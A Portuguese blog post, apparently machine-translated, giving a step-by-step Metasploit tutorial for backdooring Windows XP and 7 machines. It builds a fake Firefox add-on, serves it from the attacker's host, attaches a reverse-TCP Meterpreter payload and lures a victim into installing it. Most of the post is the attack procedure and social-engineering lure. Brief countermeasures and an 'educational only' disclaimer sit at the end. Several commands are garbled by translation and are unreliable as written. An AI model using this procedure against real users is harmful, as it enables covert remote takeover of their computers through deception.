terça-feira, 15 de janeiro de 2013

Hacking Windows 7 e XP com falsas Firefox Add-On (XPI): Tutoriais Metasploit

O que exatamente eu vou fazer?!
  1. Criar uma extensão do Firefox falso com Metasploit que cria uma backdoor no sistema da vítima.
  2. Enganam os usuários de instalar o add-on
  3. Invadir o computador de destino.
Pré-configuração:
  • Como de costume, você tem que configurar duas máquinas virutal (VM) no seu virtualbox ou seja, "Destino" e "atacante".
  • Instalar o windows xp ou 7 na VM de destino.
  • Instale o Backtrack na VM atacante.
precisam de ajuda para configurar o VM?! você pode ler este tutorial " Configurar laboratório pentesting ".

Parte I: Atualize o Metasploit
Como estamos indo para usar o mais recente módulo, você são aconselhados a atualizar os módulos do Metasploit. Não sei como fazer isso? Não precisa se preocupar!
  • Abra o Terminal
  • Tipo msfupdate
  • Isto irá atualizar o Metasploit com o mais recente módulos :)
Parte II: definições de configuração no Metasploit para a exploração falso-addon
Etapa 1:

Abra o Terminal e "msfconsole" tipo para obter o console Metasploit.

Etapa 2:
Tipo "use exploit / multi / browser / firefox_xpi_bootstrapped_addon" no console.

Etapa 3:
Agora, temos de saber a lista de configurações disponíveis para este módulo de exploração. A fim de obter a lista, você pode digitar "mostrar opções" no console.

Ao contrário do último tutorial, este módulo tem uma configuração extra para o módulo nomeadamente "addonname".

Passo 4: Configurações
Vamos definir a configuração para a sua exploração.
Digite os comandos destacou um por um no console

Comando: definir falso addonname
Detalhes: Nome para o falso add-on. você pode alterar o "fake" para qualquer nome.

Comando: SRVHOST conjunto 192.168.56.11
Detalhes: Aqui o 192.168.56.11 é o IP do Backtrack. Você pode obter este ip, basta digitar o "ifconfig" no terminal. Se você tem dificuldade em obter os detalhes de ip, por favor mande seu comentário ou ler meu post anterior.

Comando: set SRVPORT 80
Detalhes: Nosso servidor vai ser acessada através da porta 80 (porta padrão)

Comando: set URIPATH fakeEx
Detalhes: O caminho em que o falso add-on estará disponível para download. Por ex: http://192.168.56.11/fakeEx

Comando: LHOST conjunto 192.168.56.11
Detalhes: Aqui o 192.168.56.11 é o IP do Backtrack. Você pode obter este ip, basta digitar o "ifconfig" no terminal.

Passo 5: Carga

Como de costume, nós podemos usar carga TCP reversa para este ataque também. Então digite o seguinte comando no console do Metasploit:
definir payload windows / Meterpreter / reverse_tcp

Parte III: ataque de engenharia social

Configurado com êxito as configurações para a sua exploração, o que mais?! vamos lançar o exploit.
Digite "proeza" no console.
Agora, o exploit é iniciado. Nosso falso add-on está disponível em "http://192.168.56.11/fakeEx".

Uma vez vítima visitar o link, ele vai pedir usuário para instalar o add-on para visualizar a página. Quando o usuário instalar o add-on, o sistema será backdoor-ed.




Agora, você pode controlar o sistema vítima de Meterpreter.


Contramedidas:
Eu acredito que você entende os riscos de instalar o add-on de fontes desconhecidas. Então, pense duas vezes antes de instalar o add-on. Sempre use confiança extra. Pesquisa no google por comentário sobre o add-on.

Disclaimer:
O artigo dado aqui é o propósito educacional somente. Sugerimos que você tente este método em um ambiente controlado virtualbox. Nós não somos responsáveis ​​por sua atividade ilegal.
 
 
 
Fonte: BTS 
← Postagem mais recente Postagem mais antiga → Página inicial

0 comentários:

Postar um comentário

Copyright © Hacking & Security | Powered by Xandao Design by Xandao86 | Xandao86